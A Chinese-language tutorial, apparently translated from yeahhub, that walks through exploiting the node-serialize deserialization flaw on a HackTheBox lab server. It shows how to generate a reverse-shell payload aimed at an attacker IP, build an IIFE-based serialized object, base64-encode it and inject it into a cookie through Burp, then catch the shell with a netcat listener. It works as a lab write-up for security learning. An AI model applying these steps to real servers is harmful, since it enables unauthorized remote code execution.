https://www.yeahhub.com/nodejs-deserialization-attack-detailed-tutorial-2018/
node.js是一个服务器端的运行环境,封装了Google V8引擎,V8引擎执行JavaScript速度非常快,性能非常好。Node.js进行了一些优化并提供替代API,这使得Google V8引擎能够在非浏览器环境下更有效的运行。
但是node.js的序列化过程中依然存在远程代码执行漏洞。更直白的说,其实是node.js的node-serialize库存在漏洞。通过传输JavaScript IIFE(立即执行函数表达式),攻击者可以利用恶意代码(不受信任的数据),在反序列化过程中远程执行任意代码。
漏洞演示环境
靶机:hackthebox节点服务器
攻击机:Kali Linux
安装工具:nodejs,npm,nodejs toolkit,node-serialize
关于漏洞(反序列化攻击)
不受信任的数据传递到unserialize()函数,导致我们可以利用JavaScript对象的立即执行函数表达式也就是IIFE来执行任意代码。
第一步就是安装nodejs,通过apt-get命令进行安装,如下图
apt-get install nodejs
第二步,使用curl命令安装npm(需要用npm来安装node-serialize包),命令如下:
curl -L https://www.npmjs.com/install.sh | sh
当你安装和配置好了nodejs和npm之后,你就可以通过npm来安装node-serialize包了,输入以下命令即可:
npm install node-serialize
另一方面,我们已经连接到了hackthebox服务器,它的节点服务器存在漏洞,IP是10.10.10.85:3000(节点服务器上运行着nodejs express 框架,可以通过nmap来确认)
现在我们开始演示
首先,我们配置好Burp的代理设置,然后向刚才存在漏洞的IP发起请求,用Burp抓包拦截,如图:
接着选择cookie值发送到decoder模块进行解码,如图:
这个应用程序的漏洞就是从HTTP请求的cookie中读取profile的值,进行base64解码后传递给unserialize()函数。由于cookie输入是不可信的,攻击者可以精心构造恶意cookie值来利用此漏洞。
接着我们需要下载nodejs security toolkit(nodejs安全工具包)。
在终端中输入以下命令来下载工具包:
git clone https://github.com/ajinabraham/Node.Js-Security-Course.git
切换到下载的文件夹,执行以下命令来创建反向shell payload,这个payload会把JavaScript代码当成字符串来执行。
python nodejsshell.py 10.10.14.145 4443
不过首先我们得输入ifconfig来查看自己的IP地址, 然后再执行命令来创建payload,如图:
下图就是最终的反向shell payload:
现在我们用下面的JavaScript代码来生成序列化的payload
var y = {
rce : function() {}
}
var serialize = require(‘node-serialize’);
console.log(“Serialized: \n” + serialize.serialize(y));
将刚才生成的payload放到花括号里,如图:
将文件保存为exploit.js,然后使用node命令执行脚本来生成最终序列化的payload:
现在回到Burp中,切换到decoder模块并粘贴上图中的输出代码到文本框中解码成字符串,解码之前,在函数体后面加上IIFE圆括号():
然后需要对字符串进行base64编码
向10.10.10.85:3000发出请求,拦截,发送到repeater模块中,
在repeater模块中,我们把cookie里的值替换成上面我们刚生成的payload,然后点击go按钮
同时,在你的攻击机kali上监听4443端口(也就是反向shell payload里的端口)
一旦你点击了“go”按钮,服务器接收到请求,返回200 OK响应码,并显示一条错误消息” An error occurred…invalid username type”,同时在nc终端中,你会看到你已经与服务器建立了连接,状态为“connected”,然后你就可以任意执行系统命令了,如图:
